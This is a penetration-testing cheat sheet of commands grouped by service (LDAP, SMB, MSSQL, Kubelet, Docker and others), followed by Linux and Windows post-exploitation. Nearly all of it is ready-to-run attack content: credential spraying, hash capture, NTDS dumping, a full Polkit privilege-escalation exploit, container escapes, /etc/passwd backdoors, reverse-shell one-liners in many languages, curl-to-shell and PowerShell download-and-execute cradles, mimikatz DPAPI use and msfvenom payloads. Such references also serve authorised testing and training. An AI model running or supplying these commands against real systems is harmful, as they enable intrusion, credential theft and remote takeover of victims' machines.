(hydra -I snmpv2c://$TARGET -P /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt -t15 2>/dev/null &)

+---------- Read Service ----------+
snmp-check $TARGET -c COMMUNITY_STRING -v 2c

[*] (389) LDAP
+---------- Spray Service ----------+
(hydra -I ldap2://$TARGET -L usernames -P passwords -e n -t15 2>/dev/null &)

+---------- Visualise LDAP ----------+
godap $TARGET -d $DOM -t ldap/$DC -k

+---------- Domain SID ----------+
nxc ldap $TARGET --dns-server $TARGET -u '$USERNAME' -p '$PASSWORD' --get-sid

+---------- Trusted For Delegation ----------+
nxc ldap $TARGET --dns-server $TARGET -u usernames -p passwords --continue-on-success --trusted-for-delegation

+---------- Other Attacks ----------+
nxc ldap $TARGET --dns-server $TARGET -u usernames -p passwords --continue-on-success
nxc ldap $TARGET --dns-server $TARGET -u usernames -p passwords --continue-on-success -k
nxc ldap $TARGET --dns-server $TARGET -u '$USERNAME' -p '$PASSWORD' -M get-desc-users
nxc ldap $TARGET --dns-server $TARGET -u '$USERNAME' -p '$PASSWORD' --query "(servicePrincipalName=*)" "cn sAMAccountName servicePrincipalName"
nxc ldap $TARGET --dns-server $TARGET -u usernames -p passwords --continue-on-success --kerberoasting krb5-hashes
nxc ldap $TARGET --dns-server $TARGET -u '$USERNAME' -p '$PASSWORD' --dc-list --query "(SAMAccountType=805306369)" "SAMAccountName"
nxc ldap $TARGET -u '$USERNAME' -p '$PASSWORD' --query "(SAMAccountType=805306369)" "SAMAccountName" | awk '{print $6}' | grep '\$' > machines | sed 's/.$//' | tr '[:upper:]' '[:lower:]' > machines_pw; nxc smb $TARGET -u machines -p machines_pw | grep -oP '\[-\].*TRUST_ACCOUNT.*' | while read line; do echo -e "\e[1;33m$line <--- CHANGE PASSWORD NOW\!\e[0m"; done

[*] (445) SMB
+---------- Spray Service ----------+
(hydra -I smb://$TARGET -L usernames -P passwords -e n -t15 2>/dev/null &)
(hydra -I smb2://$TARGET -L usernames -P passwords -e n -t15 2>/dev/null &)

+---------- Banner ----------+
nmap $TARGET -sS -T5 --script="smb*protocols,smb*security-mode" -p445

+---------- Spider Share for Files ----------+
NXCSPIDER=$(nxc smb "$TARGET" -u '$USERNAME' -p '$PASSWORD' -M spider_plus | grep -oP '(?<=Saved share-file metadata to ")[^"]+');cat $NXCSPIDER | grep -vE 'epoch|size' | sed -E 's/[{}\",:]//g' | sed '/^        $/d' | tee smbfiles_$USERNAME

+---------- Download Files Locally ----------+
SHARE=myshare;echo "lcd smb\nuse $SHARE\nmget *" > smb_command; impacket-smbclient -dc-ip $TARGET -target-ip $TARGET $DC -k -no-pass -inputfile smb_command
mkdir smb; smbclient //$TARGET/$SHARE -N -D . -c 'lcd smb; recurse; prompt; mget *'
mkdir smb; smbclient //$TARGET/$SHARE -U '$USERNAME'%'$PASSWORD' -D . -c 'lcd smb; recurse; prompt; mget *'

+---------- Capture NTLMv2 ----------+
sudo responder -I tun0 -v
ntlm_theft.py --generate all -s $MYIP -f file; smbclient //$TARGET/'SHARE NAME' -D 'DIRECTORY/FOLDER' -U 'anonymous'%'' -c 'lcd file; recurse; prompt; mput *'
echo -n '[shell]\nCommand=2\nIconFile=\\$MYIP\\responder\\t.ico\n[Taskbar]\nCommand=ToggleDesktop' > file.scf

+---------- NTDS ----------+
nxc smb $TARGET -u '$USERNAME' -p '$PASSWORD' --ntds --user Administrator
nxc smb $TARGET --use-kcache --ntds --user Administrator

[*] (512-514) RSERVICES
+---------- Spray Service ----------+
(hydra -I rlogin://$TARGET -L usernames -P passwords -e n -t15 2>/dev/null &)

+---------- Allow All Connections ----------+
echo '+ +' > ~/.rhosts; chmod 600 ~/.rhosts

+---------- Login to Service ----------+
rsh -l $USERNAME $TARGET
rlogin -l $USERNAME $TARGET

+---------- Execute Commands ----------+
rsh -l $USERNAME $TARGET cat /etc/passwd

[*] (10249-10250) Kubelet
+---------- View Pods ----------+
kubeletctl -s $TARGET pods

+---------- Execute Commands ----------+
kubeletctl -s $TARGET run "cat /etc/passwd" --all-pods
kubeletctl -s $TARGET run "cat /etc/passwd" -p $pod -n $namespace -c $container

+---------- Get Token and CA.crt ----------+
pod=nginx; namespace=default; container=nginx
kubeletctl -s $TARGET run "ls -la /run/secrets/kubernetes.io/serviceaccount" -p $pod -n $namespace -c $container
kubeletctl -s $TARGET run "ls -la /var/run/secrets/kubernetes.io/serviceaccount" -p $pod -n $namespace -c $container
kubeletctl -s $TARGET run "ls -la /secrets/kubernetes.io/serviceaccout" -p $pod -n $namespace -c $container
kubeletctl -s $TARGET run "cat /secrets/kubernetes.io/serviceaccout/ca.crt" -p $pod -n $namespace -c $container | tee ca.crt; chmod 600 ca.crt
kubeletctl -s $TARGET run "cat /secrets/kubernetes.io/serviceaccout/token" -p $pod -n $namespace -c $container | tee token; chmod 600 token

+---------- Authenticating to Kubernetes API ----------+
kubectl -s https://$TARGET:8443 --certificate-authority=ca.crt --token=$(cat token) get pod

+---------- Kubernetes Privileges ----------+
kubectl -s https://$TARGET:8443 --certificate-authority=ca.crt --token=$(cat token) auth can-i --list

+---------- Kubernetes Pod Details ----------+
kubectl -s https://$TARGET:8443 --certificate-authority=ca.crt --token=$(cat token) get pod nginx -o yaml
kubectl -s https://$TARGET:8443 --certificate-authority=ca.crt --token=$(cat token) get pod nginx -o yaml | grep -E 'namespace:|image:'

+---------- Kubernetes Create Custom YAML ----------+
apiVersion: v1
kind: Pod
metadata:
  name: my-pod
  namespace: $namespace
spec:
  containers:
  - name: my-pod
    image: nginx:1.14.2
    command: ["/bin/bash"]
    args: ["-c", "/bin/bash -i >& /dev/tcp/$MYIP/5555 0>&1"]
    volumeMounts:
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true

+---------- Kubernetes Create Custom Pod ----------+
kubectl -s https://$TARGET:8443 --certificate-authority=ca.crt --token=$(cat token) apply -f my.yaml
kubectl -s https://$TARGET:8443 --certificate-authority=ca.crt --token=$(cat token) get pod

[*] (1433) MSSQL
+---------- Spray ----------+
(hydra -I mssql://$TARGET -L usernames -P passwords -e n -t15 2>/dev/null &)

+---------- Bruteforce ----------+
cat /usr/share/wordlists/seclists/Passwords/Default-Credentials/mssql-betterdefaultpasslist.txt | cut -d: -f1 | sort -u > /tmp/mssqlusernames
cat /usr/share/wordlists/seclists/Passwords/Default-Credentials/mssql-betterdefaultpasslist.txt | cut -d: -f2 | sort -u > /tmp/mssqlpasswords
hydra -I mssql://$TARGET -L /tmp/mssqlusernames -P /tmp/mssqlpasswords -e n -t15 2>/dev/null

+---------- Login ----------+
impacket-mssqlclient -k -no-pass -dc-ip $TARGET -target-ip $TARGET $DC
impacket-mssqlclient '$DOM'/'$USERNAME':'$PASSWORD'@'$TARGET'
impacket-mssqlclient '$DOM'/'$USERNAME':'$PASSWORD'@'$TARGET' -windows-auth

+---------- Get Hash ----------+
sudo responder -I tun0 -v
xp_dirtree \\$MYIP\$;
DB_NAME="master"; sqsh -S $TARGET -U '$USERNAME' -P '$PASSWORD' -m vertical -D $DB_NAME -C "EXEC xp_dirtree '//$MYIP/RESPONDER';"

+---------- Get DB ----------+
sqsh -S $TARGET -U '$USERNAME' -P '$PASSWORD' -m vertical -C "SELECT name FROM master.dbo.sysdatabases;" | grep -oP '^name:\s*\K\S+'

+---------- Set DB ----------+
DB_NAME="master"

+---------- Query DB ----------+
sqsh -S $TARGET -U '$USERNAME' -P '$PASSWORD' -m vertical -D $DB_NAME -C "SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;" | grep -Ei 'user'
sqsh -S $TARGET -U '$USERNAME' -P '$PASSWORD' -m vertical -D $DB_NAME -C "SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS;" | grep -i -B2 'passw'
sqsh -S $TARGET -U '$USERNAME' -P '$PASSWORD' -m vertical -D $DB_NAME -C "SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;" | grep -Ei 'account'
sqsh -S $TARGET -U '$USERNAME' -P '$PASSWORD' -m vertical -D $DB_NAME -C "SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;" | grep -Ei 'mail'
sqsh -S $TARGET -U '$USERNAME' -P '$PASSWORD' -m vertical -D $DB_NAME -C "SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;" | grep -Ei 'db'
sqsh -S $TARGET -U '$USERNAME' -P '$PASSWORD' -m vertical -D $DB_NAME -C "SELECT * FROM users;"
sqsh -S $TARGET -U '$USERNAME' -P '$PASSWORD' -m vertical -D $DB_NAME -C "SELECT @@VERSION AS version, HOST_NAME() AS hostname, SYSTEM_USER AS sys_user;"
sqsh -S $TARGET -U '$USERNAME' -P '$PASSWORD' -m vertical -D $DB_NAME -C "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
sqsh -S $TARGET -U '$USERNAME' -P '$PASSWORD' -m vertical -D $DB_NAME -C "EXEC xp_cmdshell 'dir C:\ && whoami /user /priv';"

+---------- Proxy MSSQL ----------+
wget https://github.com/0xdf-0xdf/mssqlproxy/raw/refs/heads/python3/mssqlclient.py
wget https://github.com/DaddyBigFish/mssqlproxy/releases/download/dlls/Microsoft.SqlServer.Proxy.dll
wget https://github.com/DaddyBigFish/mssqlproxy/releases/download/dlls/reciclador.dll
python3 mssqlclient.py '$DOM'/'$USERNAME':'$PASSWORD'@$TARGET
enable_ole
upload reciclador.dll C:\programdata\reciclador.dll
exit
python3 mssqlclient.py '$DOM'/'$USERNAME':'$PASSWORD'@$TARGET -check -reciclador 'C:\programdata\reciclador.dll'
python3 mssqlclient.py '$DOM'/'$USERNAME':'$PASSWORD'@$TARGET -start -reciclador 'C:\programdata\reciclador.dll'
echo 'socks5  127.0.0.1 1337' | sudo tee -a /etc/proxychains.conf
proxychains4 evil-winrm -i 127.0.0.1 -u $USERNAME -p $PASSWORD

[*] (1521) OracleTNS
+---------- Find Service Name ----------+
sudo odat snguesser -s $TARGET

+---------- Find Valid Creds ----------+
echo 'c' | sudo odat passwordguesser -s $TARGET -n XE

+---------- Execute Commands ----------+
sudo odat dbmsscheduler -s $TARGET -n XE -U '$USERNAME' -P '$PASSWORD' --cmd-exe --exec whoami

+---------- SQL Shell and Queries----------+
sudo odat search -s $TARGET -n XE -U '$USERNAME' -P '$PASSWORD' --sysdba --sql-shell
SELECT * FROM v$version
SELECT * FROM user_role_privs
SELECT * FROM user_sys_privs
SELECT * FROM user_users;
SELECT username FROM all_users
SELECT table_name FROM all_tables
SELECT * FROM tab
SELECT * FROM EMPLOYEES

+---------- Download Files ----------+
sudo odat utlfile -s $TARGET -n XE -U '$USERNAME' -P '$PASSWORD' --getFile 'C:\' 'secret.txt' output
sudo odat utlfile -s $TARGET -n XE -U '$USERNAME' -P '$PASSWORD' --getFile '/etc' 'passwd' output
sudo odat dbmsxslprocessor -s $TARGET -n XE -U '$USERNAME' -P '$PASSWORD' --getFile 'C:\' 'secret.txt' output; cat output
sudo odat dbmsxslprocessor -s $TARGET -n XE -U '$USERNAME' -P '$PASSWORD' --getFile '/etc' 'passwd' output; cat output

+---------- Upload Files ----------+
sudo odat utlfile -s $TARGET -n XE -U '$USERNAME' -P '$PASSWORD' --putFile 'C:\ProgramData\' '' upload.file

[*] (2049) NFS
+---------- List Mounts ----------+
showmount -e $TARGET; mkdir nfs 2>/dev/null

+---------- Version Check ----------+
for v in 2 3 4; do sudo mount -t nfs -o vers=$v,nolock $TARGET:/DIRECTORY ./nfs && echo "vers=$v SUCCESS" && sudo umount ./nfs || echo "vers=$v FAILED"; done

+---------- Mount NFS, List Files ----------+
sudo mount -t nfs -o vers=3,nolock "$TARGET":"/DIRECTORY" "./nfs"
sudo tree -puga "./nfs/"

+---------- Unmount NFS ----------+
sudo umount --lazy "./nfs"; rm -rf "./nfs"

+---------- Copy Files to Current Folder ----------+
sudo cp -r ./nfs/. .

+---------- Open Files as Sudo ----------+
sudo open file.txt
sudo open file.png

+---------- Add User for Reading Files ----------+
sudo adduser -u 1002 mntuser
sudo su mntuser
setpriv --reuid=1002 --regid=1002 --clear-groups -- ls -laR

[*] (2375) Docker
+---------- List Images ----------+
curl -s http://$TARGET:2375/images/json | jq -r .[].RepoTags[]
alpine:latest

+---------- Create Image ----------+
curl -s -X POST http://10.129.121.211:2375/images/create?fromImage=alpine&tag=latest

+---------- List Containers ----------+
(echo -e "ID\tSTATE\tIMAGE\tIP"; curl -s http://$TARGET:2375/containers/json?all=true | jq -r '.[] | [.Id, .State, .Image, (.NetworkSettings.Networks | to_entries[0].value.IPAddress)] | @tsv') | column -t

+---------- Create Container using Image and Start ----------+
containerID=$(curl -s -X POST http://10.129.121.211:2375/containers/create -H "Content-Type: application/json" -d '{"Image":"alpine","Cmd":["sleep", "400"],"HostConfig":{"Binds":["/:/mnt"]}}' | jq -r .Id); curl -s -X POST http://10.129.121.211:2375/containers/"$containerID"/start; curl -s -X POST http://10.129.121.211:2375/containers/"$containerID"/exec -H "Content-Type: application/json" -d '{"AttachStdout":true,"AttachStderr":true,"Tty":true,"Cmd":["chroot","/mnt","sh"]}'

+---------- Start Container ----------+
containerID=f3f61958a8f66f50f2138af84d85fdafe6e1e65ddd36fdd9fa27acc4cae57d96; curl -s -X POST http://10.129.121.211:2375/containers/"$containerID"/start; curl -s -X POST http://10.129.121.211:2375/containers/"$containerID"/exec -H "Content-Type: application/json" -d '{"AttachStdout":true,"AttachStderr":true,"Tty":true,"Cmd":["chroot","/mnt","sh"]}'

+---------- Execute Command ----------+
commandID=$(curl -s -X POST http://$TARGET:2375/containers/"$containerID"/exec -H "Content-Type: application/json" -d '{"AttachStdout":true,"AttachStderr":true,"Tty":true,"Cmd":["sh","-c","cat /mnt/etc/passwd; ls -la /mnt"]}' | jq -r .Id); curl -s -X POST http://$TARGET:2375/exec/"$commandID"/start -H "Content-Type: application/json" -d '{"Detach":false,"Tty":true}'

+---------- Remove Containers ----------+
curl -s -X DELETE http://$TARGET:2375/containers/7d9f2df890e2ce4a9c8342a64c33c01755b800b2c6b7b6106fce93fe056da256?force=true

[*] (3306) MySQL
+---------- Spray Service ----------+
(hydra -I mysql://$TARGET -L usernames -P passwords -e n -t15 2>/dev/null &)

+---------- Bruteforce Using Defaults ----------+
cat /usr/share/wordlists/seclists/Passwords/Default-Credentials/mysql-betterdefaultpasslist.txt | cut -d: -f1 | sort -u > /tmp/mysqlusernames
cat /usr/share/wordlists/seclists/Passwords/Default-Credentials/mysql-betterdefaultpasslist.txt | cut -d: -f2 | sort -u > /tmp/mysqlpasswords
hydra -I mysql://$TARGET -L /tmp/mysqlusernames -P /tmp/mysqlpasswords -e n -t15 2>/dev/null

+---------- Executing Queries ----------+
mysql -h localhost -u root --skip-ssl -p'root' -e 'show databases;'
mysql -h localhost -u $USERNAME --skip-ssl -p'$PASSWORD' -e 'show databases;'
mysql -h "$TARGET" -u $USERNAME --skip-ssl -p'$PASSWORD' -e "SELECT table_schema,table_name FROM information_schema.tables;" | grep -E 'user'
mysql -h "$TARGET" -u $USERNAME --skip-ssl -p'$PASSWORD' -e "SELECT table_schema,table_name FROM information_schema.tables;" | grep -E 'account'
mysql -h "$TARGET" -u $USERNAME --skip-ssl -p'$PASSWORD' -e "SELECT table_schema,table_name FROM information_schema.tables;" | grep -E 'mail'
mysql -h "$TARGET" -u $USERNAME --skip-ssl -p'$PASSWORD' -e "SELECT table_schema,table_name FROM information_schema.tables;" | grep -E 'db'
mysql -h "$TARGET" -u $USERNAME --skip-ssl -p'$PASSWORD' -e "SELECT table_schema,table_name,column_name FROM information_schema.columns" | grep 'passw'
mysql -h "$TARGET" -u $USERNAME --skip-ssl -p'$PASSWORD' -e "USE db_name; SELECT * FROM users\G;"
mysql -h "$TARGET" -u $USERNAME --skip-ssl -p'$PASSWORD' -e "SELECT @@version, @@hostname, user();"
mysql -h "$TARGET" -u $USERNAME --skip-ssl -p'$PASSWORD' -e "SELECT LOAD_FILE('/etc/passwd')\G;"

[*] (3389) RDP
+---------- Spray Service ----------+
(hydra -I rdp://$TARGET -L usernames -P passwords -e n -t15 2>/dev/null &)

+---------- Login to Service ----------+
xfreerdp3 /v:'$TARGET' /d:'' /u:'' /p:'' /cert:ignore /sec:nla /tls:seclevel:0 +auto-reconnect +clipboard +drive:Downloads,"/Upload"
xfreerdp3 /v:'$TARGET' /d:'$DOM' /u:'$USERNAME' /p:'$PASSWORD' /cert:ignore /sec:nla /tls:seclevel:0 +auto-reconnect +clipboard +drive:Downloads,"/Upload"

[*] (5985) WINRM
evil-winrm -i "$TARGET" -u '$USERNAME' -p '$PASSWORD'
evil-winrm -i "$TARGET" -u '$USERNAME' -H '$HASH'

# Post-Exploitation 
## Start Fileserver
python3 -m http.server 8888 -d /Upload

## Transfer Tools to a Proxy Box
scp -C -r /Upload user@proxybox:/ ; ssh user@proxybox; python3 -m http.server 8888 -d /Upload

## Linux
[*] Initial Shell
+---------- Generate resh ----------+
python3 /Upload/resh.py $MYIP 5555 /Upload/resh

+---------- Execute resh ----------+
curl -s http://$MYIP:8888/resh | sh
wget -qO- http://$MYIP:8888/resh | sh

+---------- Upgrade TTY ----------+
script /dev/null -c bash
python3 -c 'import pty; pty.spawn("/bin/bash")';
CTRL-Z; stty size; stty raw -echo; fg; export SHELL=bash; export TERM=xterm-256color; stty rows <num> columns <num>; reset

[*] File Transfer
curl -s http://$MYIP:8888/linux/linpeas.sh | sh
wget -qO- http://$MYIP:8888/linux/linpeas.sh | sh

[*] Privilege Escalation
+---------- Priv Check ----------+
curl -s http://$MYIP:8888/whoami.sh | sh

+---------- Polkit (CVE-2021-4034) ----------+
echo $'F=-Wall\n\nT=$(shell which true)\n\n.PHONY: all\nall: m.so run gconv-modules gconvpath\n\n.PHONY: clean\nclean:\n\trm -rf m.so run gconv-modules GCONV_PATH=./\n\ngconv-modules:\n\techo "module UTF-8// PWN// m 1" > $@\n\n.PHONY: gconvpath\ngconvpath:\n\tmkdir -p GCONV_PATH=.\n\tcp $(T) GCONV_PATH=./m.so:.\n\nm.so: m.c\n\t$(CC) $(F) --shared -fPIC -o $@ $<\n' >Makefile; echo $'#include <unistd.h>\nint main(){char * const e[]={"m.so:.","PATH=GCONV_PATH=.","SHELL=/x","CHARSET=PWN",NULL};return execve("/usr/bin/pkexec",NULL,e);}' >run.c; echo $'#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nvoid gconv(){}\nvoid gconv_init(void *p){char * const a[]={"/bin/sh",NULL};char * const e[]={"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",NULL};setuid(0);setgid(0);execve(a[0],a,e);exit(0);}' >m.c; make; ./run; rm gconv-modules Makefile m.c m.so run run.c; rm -rf GCONV_PATH=.

+---------- Full Privesc Scan ----------+
curl -s http://$MYIP:8888/linux/linpeas.sh | sh

+---------- Groups ----------+
newgrp developer
find / -group developer 2>/dev/null

+---------- Find Usernames + Passwords ----------+
(grep -IrinE '^\s*db[-_]?user\w*\s*=\s*|^\s*db[-_]?pass\w*\s*=\s*' / 2>/dev/null &)

+---------- Symlink: Writeable Root File ----------+
ln -sf /etc/passwd /var/log/below/error_root.log

+---------- Write: /etc/passwd ----------+
echo "any:$(openssl passwd -1 root):0:0:root:/root:/bin/bash" >> /etc/passwd && echo 'The password is: root'; su any

+---------- PATH Hijack (suid) ----------+
strace -f -o file /usr/local/bin/suid-name
cat file | grep -rine 'root'
cat file | grep -rinE 'chmod |tar '
env -i bash --norc --noprofile
TARGET_SUID=/usr/local/bin/suid-name
TARGET_BIN=tar
TEMPFOLDER=$(mktemp -d); printf %s '/bin/bash -i' > $TEMPFOLDER/$TARGET_BIN; chmod +x $TEMPFOLDER/$TARGET_BIN; export PATH=$TEMPFOLDER:$PATH;$TARGET_SUID

+---------- Polkit Version ----------+
rpm -qa | grep -i polkit | grep -i "0.11[3-9]"
apt list --installed 2>/dev/null | grep -i policykit

+---------- Port Scan Gateway ----------+
curl -s $MYIP:8888/linux/nmap | sh

+---------- Bash SUID Exploits ----------+
f=/tmp/bash;cp /bin/bash $f;chmod u+s $f
f=x;echo -e '#!/bin/bash\ncp /bin/bash /tmp\nchmod u+s /tmp/bash'>$f;chmod +x $f

+---------- Exploits ----------+
snapd_2.37          https://www.exploit-db.com/exploits/46361
sudo_1.6.9.p18      https://www.exploit-db.com/exploits/7129
polkit_0.117-2      https://www.exploit-db.com/exploits/50011

+---------- SSH Files ----------+
cd ~/.ssh; ls -la
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINzZbkLBUl5mk0AW8lPkWRXrupSiydDr8GJauiEAu3Ze<REDACTED>' > ~/.ssh/authorized_keys

+---------- Config Files ----------+
grep -r -E 'conf' /var/www

+---------- /etc/passwd Permission ----------+
ls -la /etc/passwd
nano /etc/passwd
mkpasswd -m descrypt 'password'
piS1wHGBkJ3z2
root:piS1wHGBkJ3z2:0:0:root:/root:/usr/bin/bash

+---------- Switching Users ----------+
su root -p
password

+---------- Finding Files ----------+
find / -name '*secret0*' -readable 2>/dev/null | xargs ls -la
find / -name 'root.txt' -readable -exec echo {} \; -exec cat {} \; 2>/dev/null

+---------- /etc/shadow ----------+
cat /etc/shadow

[*] Containers
+---------- Docker ----------+
curl -s --unix-socket /var/run/docker.sock http:/./images/json
curl -s --unix-socket /var/run/docker.sock http:/./containers/json
curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http:/./containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"staging:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "curl http://$MYIP:8888/shells/resh | sh"]}'
curl -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http:/./containers/f33aa36ef776879b434e918208f9db2e1bce018484a019482ff6a85cb5f98a9a/start
ls -la /var/tmp

cat /etc/mtab | grep -oP 'upperdir.*' | cut -d ',' -f1
docker ps -a
docker commit 35c090009763 tempimg
docker run -v /:/mnt --rm --privileged -it tempimg chroot /mnt sh

+---------- Run Image Privileged ----------+
docker image list
docker run -v /:/mnt --rm --privileged REPOSITORY chroot /mnt bash -c 'curl 10.10.16.9:8888/resh|sh'

+---------- Privileged: True ----------+
cat docker-compose.yml | grep 'privileged: true'
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`;mkdir -p $d/w;echo 1 >$d/w/notify_on_release;t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`;echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.16.9/resh | sh' >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";

[*] Meterpreter
msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_login; setg RHOSTS $TARGET; setg USERNAME $USERNAME; setg PASSWORD $PASSWORD; setg SESSION 1; setg PAYLOAD linux/x64/meterpreter/bind_tcp; setg PAYLOAD_OVERRIDE linux/x64/meterpreter/bind_tcp; setg PLATFORM_OVERRIDE linux; setg PSH_ARCH_OVERRIDE x64; run; background; use post/multi/manage/shell_to_meterpreter; run'

msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_login; setg RHOSTS $TARGET; setg USERNAME $USERNAME; setg PASSWORD $PASSWORD; setg SESSION 1; setg PAYLOAD linux/x64/meterpreter/reverse_tcp; setg PAYLOAD_OVERRIDE linux/x64/meterpreter/reverse_tcp; setg PLATFORM_OVERRIDE linux; setg PSH_ARCH_OVERRIDE x64; run; background; use post/multi/manage/shell_to_meterpreter; run;'

[*] Shells
+---------- One Liners ----------+
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc $MYIP 5555 >/tmp/f 
/bin/sh -i >& /dev/tcp/$MYIP/5555 0>&1
php -r '$sock=fsockopen("$MYIP",5555);exec("/bin/sh -i <&3 >&3 2>&3");'
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$MYIP",5555)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
perl -e 'use Socket;$i="$MYIP";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
ruby -rsocket -e'f=TCPSocket.open("$MYIP",5555).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
lua -e "require('socket');require('os');t=socket.tcp();t:connect('$MYIP','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"

+---------- Listeners ----------+
rlwrap nc -lvnp 5555
rlwrap msfconsole -q -x "use exploit/multi/script/web_delivery; set LHOST $MYIP; set LPORT 7777; set SRVHOST $MYIP; set TARGET 7; set payload linux/x64/shell/reverse_tcp; run"
rlwrap msfconsole -q -x "use exploit/multi/script/web_delivery; set LHOST $MYIP; set LPORT 7777; set SRVHOST $MYIP; set TARGET 7; set payload linux/x64/meterpreter/reverse_tcp; run"
rlwrap msfconsole -q -x "use multi/handler; set payload php/meterpreter/reverse_tcp; set LHOST $MYIP; set LPORT 7777; run"
rlwrap msfconsole -q -x "use multi/handler; set payload php/reverse_php; set LHOST $MYIP; set LPORT 7777; run"

+---------- MSFVenom ----------+
msfvenom -p php/reverse_php LHOST=$MYIP LPORT=5555 -f raw -o shell.php
msfvenom -p php/meterpreter/reverse_tcp LHOST=$MYIP LPORT=7777 -f raw -o shell.php
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$MYIP LPORT=5555 -f elf -o shell.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=$MYIP LPORT=5555 -f elf -o shell.elf
msfvenom -p python/shell_reverse_tcp LHOST=$MYIP LPORT=5555 -f raw -o shell.py
msfvenom -p python/meterpreter/reverse_tcp LHOST=$MYIP LPORT=7777 -f raw -o shell.py

## Windows
[*] Initial Shell
+---------- Execute ----------+
powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://$MYIP:8888/resh.ps1');resh -Reverse $MYIP -Port 5555"
\\$MYIP\$\nc.exe $MYIP 5555 -e cmd

[*] File Transfer
-->> Serve
python3 -m http.server 8888 /Upload
impacket-smbserver share /Upload/windows

-->> Transfer
curl http://$MYIP:8888/windows/nc.exe -o \programdata\nc.exe
curl http://$MYIP:8888/windows/EfsPotato.exe -o \programdata\EfsPotato.exe
curl http://$MYIP:8888/windows/PowerView.ps1 -o \programdata\PowerView.ps1
curl http://$MYIP:8888/windows/PrivescCheck.ps1 -o \programdata\PrivescCheck.ps1
curl http://$MYIP:8888/windows/Rubeus.exe -o \programdata\Rubeus.exe
curl http://$MYIP:8888/bat2exe.bat -o \programdata\bat2exe.bat
wget http://$MYIP:8888/windows/nc.exe -o \programdata\nc.exe
copy \\$MYIP\$\nc.exe \programdata
certutil -urlcache -f http://$MYIP:8888/windows/nc.exe \programdata\nc.exe

[*] Privilege Escalation
+---------- Priv Check ----------+
IEX (New-Object Net.WebClient).DownloadString('http://$MYIP:8888/whoami')

+---------- Full Privesc Scan ----------+
IEX (New-Object Net.WebClient).DownloadString('http://$MYIP:8888/windows/PrivescCheck.ps1');Invoke-PrivescCheck

+---------- Switch User: Known Creds ----------+
rlwrap nc -lvnp 5566
IEX (New-Object Net.WebClient).DownloadString('http://$MYIP:8888/Invoke-RunasCs.ps1'); Invoke-RunasCs -Username $USERNAME -Password $PASSWORD -Command cmd.exe -Remote $MYIP:5566

+---------- Restore AD Objects ----------+
powershell -c "Restore-ADObject -Identity 'GUID or DistinguishedName'"

+---------- DPAPI ----------+
curl http://$MYIP:8888/windows/mimikatz.exe -o \programdata\mimikatz.exe; \programdata\mimikatz.exe
dpapi::masterkey /in:"...\<USER>\...\...\Microsoft\Protect\<USER_SID>\<CRED_FILE>" /sid:<USER_SID> /rpc
dpapi::masterkey /in:"...\<USER>\...\...\Microsoft\Protect\<USER_SID>\<CRED_FILE>" /sid:<USER_SID> /password:$PASSWORD /protected
dpapi::cred /masterkey:<MASTER_KEY> /in:"...\<USER>\...\...\Microsoft\Credentials\<ENCRYPTED_FILE>"

+---------- SeBackupPrivilege ----------+
$a = [System.Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData('http://$MYIP:8888/windows/SeBackupPrivilegeUtils.dll')); Get-ChildItem C:\Users -Recurse -File -Include user.txt,root.txt | ForEach-Object {$d=Join-Path $env:TEMP "$([guid]::NewGuid()).txt"; [bz.OneOEight.SeBackupPrivilege.SeBackupPrivilegeUtils]::CopyFile($_.FullName,$d,[ref]$true,$true)>$null; Get-Content $d; Remove-Item $d -Force}
robocopy /b \users\administrator\desktop\ .; type \users\administrator\desktop\root.txt
$a.GetExportedTypes() | ForEach-Object { $_.FullName }
[bz.OneOEight.SeBackupPrivilege.SeBackupPrivilegeUtils].GetMethods() | ft Name, IsStatic, ReturnType

+---------- SeImpersonatePrivilege ----------+
forfiles /p C:\Windows\System32 /m cmd.exe /c "cmd /c \\$MYIP\$\EfsPotato.exe """powershell -c IEX (New-Object Net.WebClient).DownloadString('http://$MYIP:8888/resh.ps1');resh -Reverse $MYIP -Port 5566"""
wmic process call create "\\$MYIP\$\EfsPotato.exe \"\\$MYIP\$\nc.exe $MYIP 5566 -e cmd\""
